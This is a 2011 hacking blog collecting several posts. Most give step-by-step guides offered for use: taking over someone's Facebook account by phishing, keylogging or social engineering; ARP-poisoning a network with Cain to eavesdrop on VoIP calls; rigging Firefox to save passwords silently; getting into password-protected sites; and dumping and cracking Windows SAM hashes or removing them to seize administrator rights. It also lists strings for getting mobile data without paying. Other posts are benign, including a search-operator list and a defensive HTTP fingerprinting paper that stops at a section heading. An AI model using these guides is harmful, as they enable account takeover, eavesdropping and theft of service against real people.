LEARN HACKING FOR FREE

Google Stuff (WHAT I THINK)

2011-08-17T08:12:00.000-07:00

Google knows who you are talking to and who your closest associates are. And if Gmail and Google Talk were not enough, because of Orkut, Google knows who sits in your circle of friends. Thanks to Google Search, Google knows what you are searching for on the Web, including the news, type of images and newsgroup access. Thanks to Google Video, Google knows what kind of risqué videos you like to watch. Thanks to Google Finance, Google knows what stocks and businesses you are interested in. Thanks to Blogger, Google knows what you rant about and what rants you like reading. Thanks to Google Maps, Google knows where your house is and where you are going. Thanks to Google Calendar, Google knows who you are meeting with, where you are going, and what you are busy doing. Thanks to Picasa, Google even knows what you, your family, and your best friends look like. Best of all, thanks to Google Desktop, Google has access to all your documents, images, files, and everything else on your hard drive. And when Google displays customised adverts based on the e-mails you receive and searches you make, and you happen to click one of them, Google knows the kind of things you are interested in

BSNL Broadband Hack

2011-08-17T08:07:00.001-07:00

Fed up of frequent network down on BSNL Broadband. The solution? There is small hack on BSNL for this. Use third party DNS servers instead of BSNL DNS serversor run your own one like djbdns. The easiest options is to useOpenDNS. Just reconfigure your network to use the following DNS servers:

208.67.222.222
208.67.220.220

Detailed instructions specific to operating system or your BSNLmodem are available in the OpenDNS website itself. After I reconfigured my BSNL modem to use the above 2 IP addresses, my DNS problems just vanished! Other ‘freebies’ that come with OpenDNS are phishing filters and automatic URL correction. Even if your service provider’s DNS servers are working fine, you can still use OpenDNS just for these two special features. After you hack BSNL DNS servers, you will see a noticeable improvement in your broadband speed.

New BackStrings In Reliance For Free Gprs In Mobile (Opera Mini 6 Handler)

2011-08-17T08:06:00.001-07:00

Here Are the New Working Backstrings for free gprs in reliance

1) ?id=wap.mauj.com
2) ?id=0.facebook.com
3) ?id=cms.wdsap.ricinfo.com
4) ?id=reliance.sportal.co.in
5) ?id=wap.symbioticinfo.com
6) ?id=rapps.webdunia.com
7) ?id=rl.smp.mcore.com
8) ?id=ssg.wdsap.ricinfo.com
9) ?id=122.170.122.191
10) ?id=wap.rworld.co.in
11) ?id=wap.hungama.com
12) ?id=m.fb.snaptu.com ....

4 ways on How to hack facebook password

2011-08-17T08:04:00.002-07:00

4 methods

1. Facebook Phishing
2. Keylogging
3. Social engineering
4. Primary email address hack

Facebook phishing:

I have taken this method first because i think this is the most popular method/way of hacking facebook. I studied various facebook surveys taken on web about hacking facebook. The results of these surveys show "Phishing" as the most used method to hack facebook and to note…"Phishing is favorite method of facebook hackers". So, friends.. beware of facebook Phishing. Facebook staff is working hard to avoid these Facebook phishers. Phishing not only allows you to hack Facebook but also almost any email account. You have to only get the trick used to make a phisher, which i think is very easy. I learnt it without any difficulty. But, remember, this is only for educational purpose. I will not extend this topic over here as i have added more on Phishing in my article How to hack facebook password

Keylogging:

This is my second favorite, as only thing you have to do is remotely install a keylogger application (if you don't have any physical access to victim computer). Keylogging becomes more easy if you have physical access to victim computer as only thing you have to do is install a keylogger and direct it to your destination so that it will send all recorded keystrokes to pointed destination. What a keylogger does is it records the keystrokes into a log file and then you can use these logs to get required Facebook password and thus can hack facebook password. I have posted detailed information of top keyloggers in the trade for more information see my password hacking softwares section

3. Social engineering:

This sounds to be pretty not working at beginning. Even I was neglecting this way. But, once, I thought of using it against my friend on Facebook and i got his Facebook password very easily by this method. I think many of you might be knowing how what this social engineering, For newbies, social engineering is method of retrieving password or answer of security question simply be quering with the victim. You have to be very careful while using this as victim must not be aware of your intention. Just ask him cautiously using your logic.

4.Primary email address hack

If Facebook hacker, by some means, hacks your gmail or yahoo account which you are using as primary email address, then this Facebook hacker can easily hack your Facebook password using "Forgot password" trick. He will simply ask Facebook to send password reset email to your primary email address- which is already hacked. Thus, your Facebook account password will be reset and it will be hacked !!!

So, always remember to protect your Facebook primary email address and try to keep unknown or useless mail id as your primary email address
So far, i found these Facebook hacking methods as best and working ways to hack facebook account passwords. I never encourage hacking Facebook or any email account,,I just wanna make you aware about Facebook dangers online. I will appreciate your effort if you mention any other Facebook hacking method.

How To Sniff VOIP Session Using Cain

2011-08-17T08:04:00.000-07:00

Voice over Internet Protocol (Voice over IP, VoIP) is one of a family of internet technologies, communication protocols, and transmission technologies for delivery of voice communications and multimedia sessions over Internet Protocol (IP) networks, such as the Internet. Other terms frequently encountered and often used synonymously with VoIP are IP telephony, Internet telephony, voice over broadband (VoBB), broadband telephony, and broadband phone.

Cain is an excellent software which can be used for sniffing a VOIP, There are couple of methods to sniff a VOIP session but in this tutorial I will explain you how you can use a Man in the Middle Attack with Cain and Abel to sniff a VOIP conversation.

Sniff VOIP Session With Cain

So here is how you can capture a VOIP session on your network:

Step 1 - First of all download Cain and install it.

Step 2 - Once cain is successfully installed go ahead and launch it, Now launch the sniffer by clicking on a small green button just below the file option

Step 3 - Next click on the blue "+" at the top, choose "All hosts in my subnet" and click ok

Step 4 - This will show you all the active hosts on your network.

Step 5 - Next goto ARP tab at the bottom and press the blue "+" sign, select the hosts on which you want to you want to perform a man in the middle attack and click ok

Step 6 - Now just click on the little yellow "Microtoxic" button at the top to launch the ARP Poisoning attack which is the real name for Man in the middle attack..

Step 7 - Next click VOIP tab at the bottom and if cain has captured a VOIP session, you will get similar results.

Hack Firefox to autosave password without notification

2011-08-17T08:02:00.001-07:00

Step To Do This Firefox Hack

1) First you need to close firefox.

2) Now locate the nsloginmanagerprompter.js which is normally found in

C:\ProgramFiles\MozillaFirefox\Components\

3) Open nsloginmanagerprompter.js with notepad ++

4) Replace the entire line 804 to 869 with the following code var pwmgr = this._pwmgr;pwmgr.addLogin(aLogin); When you've done that "save as" to your desktop, then drag back in to the original folder and replace the file.

To see the usernames + passwords you need to click on tools at the top of your browser and go to page info then security.

They will be saved into the saved passwords section.

Enjoy And donot forget to comment

Hacking Pssword Protected Website's

2011-08-17T07:55:00.000-07:00

warning : For educational purpose only

i know dis is lame but just would like to share wid u.
have nothing for next half an hour so typing it.. lol
Harish Makam

here are many ways to defeat java-script protected websites. Some are very simplistic, such as hitting
[ctl-alt-del ]when the password box is displayed, to simply turning offjava capability, which will dump you into the default page.You can try manually searching for other directories, by typing the directory name into the url address box of your browser, ie: you want access to www.target.com .

Try typing www.target.com/images .(almost ever y web site has an images directory) This will put you into the images directory,and give you a text list of all the images located there. Often, the title of an image will give you a clue to the name of another directory. ie: in www.target.com/images, there is a .gif named gamestitle.gif . There is a good chance then, that there is a 'games' directory on the site,so you would then type in www.target.com/games, and if it isa valid directory, you again get a text listing of all the files available there.

For a more automated approach, use a program like WEB SNAKE from anawave, or Web Wacker. These programs will create a mirror image of an entire web site, showing all director ies,or even mirror a complete server. They are indispensable for locating hidden files and directories.What do you do if you can't get past an opening "PasswordRequired" box? . First do an WHOIS Lookup for the site. In our example, www.target.com . We find it's hosted by www.host.com at 100.100.100. 1.

We then go to 100.100.100.1, and then launch \Web Snake, and mirror the entire server. Set Web Snake to NOT download anything over about 20K. (not many HTML pages are bigger than this) This speeds things up some, and keeps you from getting a lot of files and images you don't care about. This can take a long time, so consider running it right before bed time. Once you have an image of the entire server, you look through the directories listed, and find /target. When we open that directory, we find its contents, and all of its sub-directories listed. Let's say we find /target/games/zip/zipindex.html . This would be the index page that would be displayed had you gone through the password procedure, and allowed it to redirect you here.By simply typing in the url www.target.com/games/zip/zipindex.html you will be onthe index page and ready to follow the links for downloading.

Google Search Tricks

2011-08-17T07:46:00.000-07:00

very lame now.. But many of you still dont know this so here it is for u.. a Compilation

Restrictive Searches Google also has restrictive searches that allow you to limit the sites or information that you are searching for.
[soccer site:whitehouse.gov] Will return only documents from the site whitehouse.gov with the word soccer on the page, in the title or in the anchor text that links to the page.
[intitle:soccer site:whitehouse.gov] Will return only documents from the site whitehouse.gov with the word soccer in the title.
[ipod $100..$150] Will return pages with the word IPod on the page, in the title, or anchor text linking to the page, and with dollar amounts between $100 and $150 on the page, in the title, or in the anchor text linking to the web page.
[ipod $100..$150 “in stock”] Will return pages with the word IPod, and “in and stock” on the page, in the title, or anchor text linking to the page, and with dollar amounts between $100 and $150 on the page, in the title, or in the anchor text linking to the web page.
[ipod $100..$150 “in stock” -shuffle (green OR blue)] Will return pages with the word IPod, and “in and stock” on the page, in the title, or anchor text linking to the page, and with dollar amounts between $100 and $150 on the page, in the title, or in the anchor text linking to the web page. The word shuffle must not be on the page, in the title or anchor text, and the page, title or anchor text must contain either the word green or blue.
[telescope filetype:pdf] Will return only PDF files with the word telescope on the document, in the title or in the anchor text to the document. Filetypes can be any of the following: Adobe Portable Document Format (pdf), Adobe PostScript (ps), Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku), Lotus WordPro (lwp), MacWrite (mw), Microsoft Excel (xls), Microsoft PowerPoint (ppt), Microsoft Word (doc), Microsoft Works (wks, wps, wdb), Microsoft Write (wri), Rich Text Format (rtf), Shockwave Flash (swf), Text (ans, txt).
[telescope filetype:pdf intitle:dobsonian 2004..2005] Will return only PDF files with the word telescope on the document, in the title or in the anchor text to the document. The title must contain the word Dobsonian and the document will contain numbers from 2004 through 2005.
[link:whitehouse.gov] Provides a completely random sampling of some sites that link to whitehouse.gov. There is no logic or reason to the sites displayed or the order they are displayed in. Many sites that link to you will not be displayed. This search is considered “broken”.
[info:whitehouse.gov]Provides links to information and searches about the website whitehouse.gov.
[cache:whitehouse.gov] Displays a copy of the page stored on Google’s server. This may vary from the actual page on the website.

Specialized Searches

Google has a number of specialized searches that search through a small subset of data for highly relevant results.
[phonebook: gibson NY] Will return a sampling of business and residential listings with the word gibson in the name, town or street that are in New York.
[bphonebook: gibson NY]Will return a business listings with the word gibson in the name, town or street that are in New York.
[rphonebook: gibson NY]Will return a residential listings with the word gibson in the name that are in New York.
[movie:Goblet of Fire] Will return pages about the Goblet of Fire, contain the words Goblet of Fire . Has links to reviews about the Goblet of Fire and movie show times.
[movie: flux capacitor] Will return pages about movies with the words flux capacitor on them.
[stocks:goog] Will return information about the stock symbol GOOG.
[weather las vegas NV] Will give the local weather for Las Vegas Nevada.
[fly JFK LAX] Links to flight information from JFK airport to LAX airport.
[fly new york to los angeles] Link to flight information from New York to Los Angeles
[jetblue 189] Provides a direct link to the status of Jet Blue Airlines flight 189.
[frank zappa] Links to More information about Frank Zappa, albums, and other information. This is sometimes hit or miss depending on the artist.
[related:whitehouse.gov] Returns links to other pages that are about similar topics or information. Some of these sites will have links that exist between them others will not. In some cases this may show direct competition, for example [related:walmart.com]
[1600 pennsylvania avenue washington dc] This is an address search and provides a direct link to Google Map for the address.

Fact Searches

This category provides you with immediate answers to a specific narrow set of questions. It’s a bit of hit or miss here but here are some examples.
[gdp malta] Gross Domestic Product of Malta
[population malta] Population of Malta.
[capital malta] The capital of Malta.
[location malta] Rough idea of where Malta is located.
[currency malta] What is the currency of Malta.
[flag france] The flag of France. Note there was no flag shown for Malta.
[anthem france] What is the national anthem of France.
[state bird hawaii] What is the state bird of Hawaii.
[state flower hawaii] State flower of Hawaii.
[motto hawaii] what is the state motto of Hawaii.
[size hawaii]
[governor hawaii] The governor of Hawaii.
[birthplace of walt disney] Where Walt Disney was born.

Math and Number Searches

[100+37+92+641-7] Works like a calculator to perform math operations.
[how many teaspoons in a tablespoon] Provides the answer to measurement conversions.
[convert 300 yen to dollars] Provides currency conversion
[1Z9999W99999999999] Provides a link to UPS tracking information.
[790187289080] Provides a link to Fed Ex tracking information.
[0103 8555 7493 2721 4413] Provides a link to USPS tracking information.
[1HD1BEK11BY123456]
Provides a link to VIN (Vehicle Identification Number) information.
[073333531084]Provides a link to UPC information for that product.
[212] Provides a link to information about the area code 212.
[202-456-1111]Provides a link to more information about the residence, business, or organization for that phone number.
[patent 5123128]Provides a link to more information about patent number 5123128.
[n199ud] Provides a link for more information about the FAA registration for the airplane with that registration number.
[fcc IHDT5ZG1]Provides a link to information about the product with that FCC id number

[blue widgets] Finds pages with the words blue and/or widgets on them, in the title, or used in the anchor text to link the page. Words may not be near each other (this is known as proximity).
[“blue widgets”] Finds pages with the words blue and widgets on them, in the title, or used in the anchor text to link the page. The words must be next to each other and in the exact same order. This type of query is known as an exact phrase match.
[blue or widgets] Finds pages with the words blue or widgets on them, in the title, or used in the anchor text to link the page.
[blue and widgets] Finds pages with the words blue and widgets on them, in the title, or used in the anchor text to link the page. Both words must occur in one of the cases, but can occur in any order.
[blue -widgets] Finds pages with the words blue on them, in the title, or used in the anchor text to link the page. The page, title and anchor text must not have the word widgets in them It’s very important that the minus sign [-] be next to the word without a space. This is known as a negative search term.
[blue ~widgets] Finds pages with the word blue on them, in the title, or used in the anchor text to link the page. It also returns documents with synonyms for the word next to the tilde [~] (in this case widgets) on the page, in the title or in the anchor text to the page.
[define: blue] This will give you definitions for the word [blue] and links to pages with definitions.

Compound Searches

Using logical operators like [and] and [or] we can create complex searches. We can create extremely complex searches by combining logical operators using parenthesis. These complex searches can also be combines with [”] and [-] as well.

[widgets (red OR blue)] Finds pages with the words widgets on them, in the title, or used in the anchor text to link the page. The words blue or red must be on the page, in the title or in the anchor text used to link to the page.
[widgets (red AND blue)] Finds pages with the word widgets on them, in the title, or used in the anchor text to link the page. The words blue and red must be on the page, in the title or in the anchor text used to link to the page.
[widgets (red AND blue) -green] Finds pages with the word widgets on them, in the title, or used in the anchor text to link the page. The words blue and red must be on the page, in the title or in the anchor text used to link to the page. The word green must not be on the page, in the title or in the anchor text used to link to the page.
Lets say you wanted to do a search for people who haven’t posted or updated their blog in a while, here’s how you would create that query [“haven’t (updated OR posted)” and blog]

Search Modifiers

Google has a series of search modifiers that allow you to perform very specific searches, these include [inanchor], [intext], [intitle], and [inurl]. In addition you can also add the word [all] in front of each term to include all of the words in the phrase. These modifiers can also be combined with the [”] , [-], and logical operators and be used to create complex queries.

[inanchor:blue widgets] Returns pages where the words blue is used by other pages or websites to link to the page, and have the word widgets on the page, in the title, or in the anchor text used to link to the page.2
[allinanchor:blue widgets] Returns pages where the words blue and widgets are used by other pages or websites to link to the page.
[intitle:blue widgets]Returns pages where the word blue is used in the title, and the word widgets is on the page, in the title, or in the anchor text used to link to the page.
[allintitle:blue widgets]Returns pages with the words blue and widgets are in the title.
[inurl:blue widgets]Returns pages where the word blue is used in the URL, and the word widgets is on the page, in the title, or in the anchor text used to link to the page.
[allinurl:blue widgets]Returns pages with the words blue and widgets are in the URL.
Lets say you were looking for pages about cookbooks where people used the words celebrity to link to them here is a query you might construct [cookbooks inanchor:celebrity]
Lets refine that query taking out all the bad, horrible, and terrible cookbooks with this query [cookbooks -bad -horrible -terrible inanchor:celebrity]
Now lets refine it once more to find only cookbooks with recipes from your favorite movie star Alicia Silverstone in them [cookbooks “alicia silverstone” -bad -horrible -terrible inanchor:celebrity]

How to get Windows 2000 and NT administrator rights

2008-01-23T22:29:00.000-08:00

How to get Windows 2000 and NT administrator rights

I have tried all possible ways and solutions. in this text I'm only gonna write as short as possibly how to get your forgotten administrator password back. Of courseyou will only use this to get your own administrator password back... : ) If you get somebody elses administrator password and mess up that computer the "real administrator" gets pretty pissed off! Trust me... :)
I will also include all the progs I use to get "my administrator" password. Ok, let's cut the bullshit.

First off all, there is no right and only way of doing this. It all depends on the situation. Let's begin with scenario one:

You can log in with an other username besides administrator. This is the most simpleway. Once you are logged in, the rest is very simple. First, there are three programs we can use now: LC3, pwdump2 or samdump. If you can install LC3 on the computer, everything is bueno. But lets assume that whitout administrator rights you won't be able to install anything (like in my case). Pwdump2 also needs administrator rights to be run so we won't use that one eighter. But samdump can be! Let's use that one. samdump is a very small and clever program that dumps the samdatabase to a textfile. Use it like this from the dospromt: samdump > hashes.txt Now we have the password hashes in a textfile called hashes.txt. Allright, now we have the administrator password!! Yeah! Well, not quite. Instead do the following: copy hashes.txt to a floppy. Now we'll need another program, LC3. Install LC3 on a coputer where available. Then when ready installed: new session > import PWDUMP file. Open the hashes.txt from your floppy. Run the program. LC3 will now use password lists AND bruteforce on the samdump. Finally you will get the administrator password (all depends on your computer speed. With a 500-700mhz it should take from 5minutes to 20 hours.)

That was scenario one. Now to scenario two.

Let's assume that we can't log in to the computer and run samdump. Now it's a litle bit harder to get the samdatabase. Now you'll need a bootable windows 98 startup floppy. I'm not providing you with it. If you can't get or do one yourselfe, don't bother to get the
administrator password eighter. In that case there are more important things to do... Ok, now when you got the 98 floppy, put it inside the floppy drive. And if there is no floppy drive you can do a bootable 98 cd too, or just use the windows 98 cd. now when the coputer has booted from your 98 disk, browse to %root%winnt/system/ There write:
copy sam a:\ (yees, of course.. put in a blank formatted floppy...) Now you can use the LC3 cracking program to get the administrator password. Like above but instead of
PWDUMP you take sam file.

Ok, what if %root% were windows is installed has NFTS??! Ok, don't panic. I have the solution for you. NTFSDOS! Boot with your windows98 floppy and when booted insert the floppy with NTFSDOS. Run NTFSDOS. Copy the samfile to a floppy...

There is also another program called NTFSDOSpro. It can write to the NTFS partition! If you are in a hurry you can simply remove the sam file. (don't do this on somebody elses computer, the administrator will notice it immediately!! And that is no good.) When sam is removed, simply log in with administrator and leav password blank. If any errors occure, just press ok.

Ok, what if I can't boot from floppy, CD or get into windows, then what??! Now we have to crack the bios to get the bios password so we can change the boot media. To do this, use known backdoors. Here is a link to a fairly new one for several bioses. If that doesn't work, try to download a bios flash disk and see if it boots from it (can't provide you with them because there are hundreds of them! use a search engine.) And if that doesn't work, try to remove the bios battery and see if it will reset the bios.

I will provide you with more stuff later on braking bioses!

|::Chrisse1000::|

An Introduction to HTTP fingerprinting

2008-01-23T22:24:00.000-08:00

An Introduction to HTTP fingerprinting

1. Abstract
HTTP Fingerprinting is a relatively new topic of discussion in the context of application security. One of the biggest challenges of maintaining a high level of network security is to have a complete and accurate inventory of networked assets. Web servers and web applications have now become a part of the scope of a network security assessment exercise. In this paper, we present techniques to identify various types of HTTP servers. We shall discuss some of the problems faced in inventorying HTTP servers and how we can overcome them.

We shall also introduce and describe a tool, httprint, which is built using the concepts discussed in this paper.

2. Theory of Fingerprinting
A fingerprint is defined as:

The impression of a fingertip on any surface; also: an ink impression of the lines upon the fingertip taken for the purpose of identification.
something that identifies: as (a) a trait, trace, or characteristic revealing origin or responsibility (b) analytical evidence that characterizes an object or substance.
The process of fingerprinting can be broken up into two sub processes, namely gathering and classification of fingerprints, and comparision of unknown fingerprints with the stored database of known fingerprints.

While gathering fingerprints, it is essential to capture all the key characteristics of the object revealed in the fingerprint. Capturing more details and traits helps in the comparision process. While comparing fingerprints, there may be chances that a fingerprint can be improperly matched, because of subtle differences that can be easily mistaken.

Fingerprinting is a known technique in network security. Operating system fingerprinting is a common task in any network assessment or inventorying exercise. There are many techniques to perform operating system fingerprinting. What makes operating system fingerprinting successful and accurate is the fact that each operating system implements the TCP/IP stack slightly differently. The way a system responds to malformed packets, either the presence of an error response, or absence thereof, is one example of an implementation difference. A detailed discussion on operating system fingerprinting, or TCP/IP stack fingerprinting, is presented in Fyodor's paper, titled "Remote OS detection via TCP/IP Stack Fingerprinting" [1]

The theory behind HTTP fingerprinting is more or less on the same lines - identifying HTTP servers by their implementation differences in the HTTP protocol. HTTP fingerprinting gets slightly more complicated than TCP/IP stack fingerprinting. The reason being that it is easily possible to customize the responses of an HTTP server by just changing its configuration file, or adding plug-ins or modules, whereas customising the behaviour of the TCP/IP stack requires access to the network code at the kernel layer. Despite this difficulty, it is possible to devise tests to overcome the various customizable features of a web server.

3. Banner grabbing
The simplest and most basic form of identifying HTTP servers is to look at the Server field in the HTTP response header [2]. Using a TCP client like netcat [3], it is possible to send an HTTP request to return the HTTP response header of the server, as shown below:

$ nc 202.41.76.251 80HEAD / HTTP/1.0HTTP/1.1 200 OKDate: Mon, 16 Jun 2003 02:53:29 GMTServer: Apache/1.3.3 (Unix) (Red Hat/Linux)Last-Modified: Wed, 07 Oct 1998 11:18:14 GMTETag: "1813-49b-361b4df6"Accept-Ranges: bytesContent-Length: 1179Connection: closeContent-Type: text/html$
Three examples of the HTTP response header are shown below:

From an Apache 1.3.23 server:

HTTP/1.1 200 OKDate: Sun, 15 Jun 2003 17:10:49 GMTServer: Apache/1.3.23Last-Modified: Thu, 27 Feb 2003 03:48:19 GMTETag: "32417-c4-3e5d8a83"Accept-Ranges: bytesContent-Length: 196Connection: closeContent-Type: text/html
From a Microsoft IIS 5.0 server:

HTTP/1.1 200 OKServer: Microsoft-IIS/5.0Expires: Tue, 17 Jun 2003 01:41:33 GMTDate: Mon, 16 Jun 2003 01:41:33 GMTContent-Type: text/htmlAccept-Ranges: bytesLast-Modified: Wed, 28 May 2003 15:32:21 GMTETag: "b0aac0542e25c31:89d"Content-Length: 7369
From a Netscape Enterprise 4.1 server:

HTTP/1.1 200 OKServer: Netscape-Enterprise/4.1Date: Mon, 16 Jun 2003 06:19:04 GMTContent-type: text/htmlLast-modified: Wed, 31 Jul 2002 15:37:56 GMTContent-length: 57Accept-ranges: bytesConnection: close
4. Applications of HTTP fingerprinting
From a network management standpoint, HTTP fingerprinting comes in very handy when keeping track of the various web servers on a network. HTTP fingerprinting can also be used to automate information systems and security audits. Automated security testing tools can use HTTP fingerprinting to narrow down the set of tests required, based on the specific platform or the specific web server being audited.

Some of the applications of HTTP fingerprinting are:

Network management: Web server inventory
Penetration testing / Auditing: Selecting the right attacks or audit tests for web servers
Wireless networks: Detecting 802.11x access points from the wired network, since most APs have a web enabled interface
Web enabled devices: Printers, storage servers, switches, etc. Many times, web enabled devices do not return a server banner string at all, making it difficult to identify and track them.
5. Obfuscating the server banner string
Banner grabbing proves to be a good method of HTTP fingerprinting in many cases. However, many times, server administrators chose to disguise the server banner string, by providing one of their own. Such, "security-by-obscurity" methods help thwart a lot of automated attacks against web servers.

It is easy to configure servers to return different server banner strings. In open source servers such as Apache, one can change the banner string in the source code and re-compile the server. For non-open source servers such as Microsoft IIS or Netscape Enterprise, it is possible to "patch" the binary by opening it up in a hex editor and changing the string embedded in the binary. It is not so easy to do this always, but it has been done successfully. Another way of obscuring the server banner string is to write a custom plug-in for the web server, which can provide customized HTTP responses. A commercial product, called ServerMask [4] from Port 80 Software performs such obfuscation on HTTP responses.

The example below shows the response from an HTTP server with a customized server banner string:

Apache Server recompiled with "Unknown-Webserver/1.0" as the server banner string

HTTP/1.1 403 ForbiddenDate: Mon, 16 Jun 2003 02:41:27 GMTServer: Unknown-Webserver/1.0Connection: closeContent-Type: text/html; charset=iso-8859-1
The example below shows the response from an HTTP server using ServerMask:

IIS Server using the ServerMask plug-in

HTTP/1.1 200 OKServer: Yes we are using ServerMaskDate: Mon, 16 Jun 2003 02:54:17 GMTConnection: Keep-AliveContent-Length: 18273Content-Type: text/htmlSet-Cookie: It works on cookies too=82.3S3.O12.NT2R0RE,4147ON3P,.4OO.; path=/Cache-control: private
As we can see from the above examples, relying purely upon the contents of the server banner string is not enough for identifying the type of HTTP server.

6. Protocol behaviour
Almost all HTTP servers differ in the way they implement the HTTP protocol. In the case where the HTTP request is well formed and legitimate, the response returned by all HTTP servers is more or less compliant with the specifications laid out in the RFCs for HTTP[5]. However, when confronted with malformed HTTP requests, these servers differ in their responses. Differences in the way the HTTP protocol is handled by various HTTP servers forms the basis of the HTTP fingerprinting technique.

Let us illustrate these differences with examples. We shall analyse the response to four HTTP requests, coming from an Apache 1.3.23 server, a Microsoft IIS 5.0 server and a Netscape Enterprise 4.1. The requests are:

HTTP Test What to expect
HEAD / HTTP/1.0 Normal HTTP header response
DELETE / HTTP/1.0 Response when operations such as DELETE aren't generally allowed
GET / HTTP/3.0 Response to a request with an improper HTTP protocol number
GET / JUNK/1.0 Response to a request with an improper protocol specification

In each of these responses, we shall identify key differences between the responses of Apache 1.3.23, IIS 5.0 and Netscape Enterprise 4.1. We shall not take into consideration differences in customizable parameters such as the server banner string.

6.1 HTTP header field ordering
Taking the first request HEAD / HTTP/1.0, we shall analyse the HTTP response header and inspect the order of appearance of the various fields returned within it.

Response from Apache 1.3.23

$ nc apache.example.com 80HEAD / HTTP/1.0HTTP/1.1 200 OKDate: Sun, 15 Jun 2003 17:10:49 GMTServer: Apache/1.3.23 Last-Modified: Thu, 27 Feb 2003 03:48:19 GMTETag: "32417-c4-3e5d8a83"Accept-Ranges: bytesContent-Length: 196Connection: closeContent-Type: text/html
Response from IIS 5.0

$ nc iis.example.com 80HEAD / HTTP/1.0HTTP/1.1 200 OKServer: Microsoft-IIS/5.0Content-Location: http://iis.example.com/Default.htmDate: Fri, 01 Jan 1999 20:13:52 GMTContent-Type: text/htmlAccept-Ranges: bytesLast-Modified: Fri, 01 Jan 1999 20:13:52 GMTETag: W/"e0d362a4c335be1:ae1"Content-Length: 133
Response from Netscape Enterprise 4.1

$ nc netscape.example.com 80HEAD / HTTP/1.0HTTP/1.1 200 OKServer: Netscape-Enterprise/4.1Date: Mon, 16 Jun 2003 06:01:40 GMTContent-type: text/htmlLast-modified: Wed, 31 Jul 2002 15:37:56 GMTContent-length: 57Accept-ranges: bytesConnection: close
If we observe the ordering of the response header fields Server and Date, we notice that Apache orders the fields differently than IIS and Netscape.

6.2 HTTP DELETE (forbidden operation) response
Next, we shall take the request DELETE / HTTP/1.0 and observe what the response of each of the servers is, when the requested operation is generally forbidden.

Response from Apache 1.3.23

$ nc apache.example.com 80DELETE / HTTP/1.0HTTP/1.1 405 Method Not AllowedDate: Sun, 15 Jun 2003 17:11:37 GMTServer: Apache/1.3.23 Allow: GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, PATCH, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK, TRACEConnection: closeContent-Type: text/html; charset=iso-8859-1
Response from IIS 5.0

$ nc iis.example.com 80DELETE / HTTP/1.0HTTP/1.1 403 ForbiddenServer: Microsoft-IIS/5.0Date: Fri, 01 Jan 1999 20:13:57 GMTContent-Type: text/htmlContent-Length: 3184
Response from Netscape Enterprise 4.1

$ nc netscape.example.com 80DELETE / HTTP/1.0HTTP/1.1 401 UnauthorizedServer: Netscape-Enterprise/4.1Date: Mon, 16 Jun 2003 06:03:18 GMTWWW-authenticate: Basic realm="WebServer Server"Content-length: 223Content-type: text/htmlConnection: close
Apache responds with a 405 "Method not allowed" response, IIS responds with a 403 "Operation on resource forbidden" response, and Netscape responds with a 401 "Authorization credentials required" response. Each of the servers differs in their response to the DELETE request.

6.3 Improper HTTP version response
The next test consists of sending an HTTP request with an improper HTTP version number, such as GET / HTTP/3.0, to the server. HTTP 3.0 is not even in existence as of this writing, and none of the candidate servers implement it.

Response from Apache 1.3.23

$ nc apache.example.com 80GET / HTTP/3.0HTTP/1.1 400 Bad RequestDate: Sun, 15 Jun 2003 17:12:37 GMTServer: Apache/1.3.23 Connection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=iso-8859-1
Response from IIS 5.0

$ nc iis.example.com 80GET / HTTP/3.0HTTP/1.1 200 OKServer: Microsoft-IIS/5.0Content-Location: http://iis.example.com/Default.htmDate: Fri, 01 Jan 1999 20:14:02 GMTContent-Type: text/htmlAccept-Ranges: bytesLast-Modified: Fri, 01 Jan 1999 20:14:02 GMTETag: W/"e0d362a4c335be1:ae1"Content-Length: 133
Response from Netscape Enterprise 4.1

$ nc netscape.example.com 80GET / HTTP/3.0HTTP/1.1 505 HTTP Version Not SupportedServer: Netscape-Enterprise/4.1Date: Mon, 16 Jun 2003 06:04:04 GMTContent-length: 140Content-type: text/htmlConnection: close
Apache responds with a 400 "Bad HTTP request" response, IIS ignores the improper HTTP protocol number, and responds with a 200 "OK" along with the contents of the HTML data for the root document, and Netscape responds with a 505 "HTTP version not supported" response.

6.4 Improper protocol response
The next test involves observing the response to the request GET / JUNK/1.0.

Response from Apache 1.3.23

$ nc apache.example.com 80GET / JUNK/1.0HTTP/1.1 200 OKDate: Sun, 15 Jun 2003 17:17:47 GMTServer: Apache/1.3.23 Last-Modified: Thu, 27 Feb 2003 03:48:19 GMTETag: "32417-c4-3e5d8a83"Accept-Ranges: bytesContent-Length: 196Connection: closeContent-Type: text/html
Response from IIS 5.0

$ nc iis.example.com 80GET / JUNK/1.0HTTP/1.1 400 Bad RequestServer: Microsoft-IIS/5.0Date: Fri, 01 Jan 1999 20:14:34 GMTContent-Type: text/htmlContent-Length: 87
Response from Netscape Enterprise 4.1

$ nc netscape.example.com 80GET / JUNK/1.0Bad request

Bad request

Your browser sent a query this server could not understand.
In this case, Apache ignores the improper protocol "JUNK", and responds with a 200 "OK" along with the contents of the root document, IIS responds with a 400 "Bad Request" response and Netscape does not even return an HTTP response header, but instead just returns an HTML formatted error message stating that this request is a bad request.

6.5 Summary of test results
The following table summarizes the various tests and the responses from each of the HTTP servers. It is easy to figure out how to distinguish HTTP servers from such tests.

Server Field Ordering DELETE Method Improper HTTP version Improper protocol
Apache/1.3.23 Date, Server 405 400 200
Microsoft-IIS/5.0 Server, Date 403 200 400
Netscape-Enterprise/4.1 Server, Date 401 505 no header

6.6 Choosing the right tests
In the above example, we discussed four HTTP tests, and observed the differences in the responses from three popular HTTP servers. For an industrial strength HTTP fingerprinting engine, we require more than four HTTP tests. The larger the number of HTTP tests, the better the results of fingerprinting, and the greater the accuracy in matching fingerprints. On the other hand, fewer HTTP tests imply faster execution time.

Fingerprinting tests are of two types

Decision tree bases tests
Statistical analysis tests
Decision tree based tests rely on the construction of a tree of tests, which eliminates possibilities progressively, much in the same manner as testing for an unknown chemical compound, based on the results of progressive chemical reaction tests. Decision tree based tests are difficult to scale, and each HTTP server would have specific contributions to the construction of the decision tree. Adding tests for a new HTTP server would involve re-writing the entire decision tree.

Statistical analysis tests usually involve a fixed set of tests, which result in an array of weights being generated for each type of HTTP server. The decision as to what the outcome is, is based on comparing the various weights generated for each server. The accuracy of statistical analysis tests depends on the algorithms used to assign and compare the weights for each HTTP server. Statistical based models yield themselves quite easily to be adapted into neural machines, which can be trained with a set of known values.

7. Statistical and Fuzzy analysis
